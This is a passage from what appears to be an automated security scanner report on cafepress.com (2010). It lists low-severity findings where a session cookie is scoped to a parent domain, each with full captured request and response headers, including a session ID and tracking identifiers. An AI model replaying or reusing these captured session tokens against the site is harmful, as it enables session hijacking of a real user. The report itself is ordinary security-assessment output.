GET /cp/products/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 91664
Date: Sun, 26 Dec 2010 13:44:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 91664

<head> <title>Products at CafePress.com</title> </head> <body> <h1>Products at CafePress.com</h1> <div> <a href="?pg=0">Product range 0</a> <a href="?pg=1">Product range 1</...[SNIP]...
2.49. http://www.cafepress.com/cp/sitemap/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/sitemap/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/sitemap/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 147577
Date: Sun, 26 Dec 2010 13:44:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 147577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
2.50. http://www.cafepress.com/cp/tags/
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/tags/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/tags/ HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 204157
Date: Sun, 26 Dec 2010 13:44:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 204157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Tags at Cafepress</ti...[SNIP]...
2.51. http://www.cafepress.com/cp/viewcart.aspx
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/cp/viewcart.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/viewcart.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 51119
Date: Sun, 26 Dec 2010 13:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.52. http://www.cafepress.com/make/birth-announcements
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/birth-announcements
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54454
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.53. http://www.cafepress.com/make/custom-baby-gear
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 71150
Date: Sun, 26 Dec 2010 13:48:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.54. http://www.cafepress.com/make/custom-buttons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 54710
Date: Sun, 26 Dec 2010 13:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54710

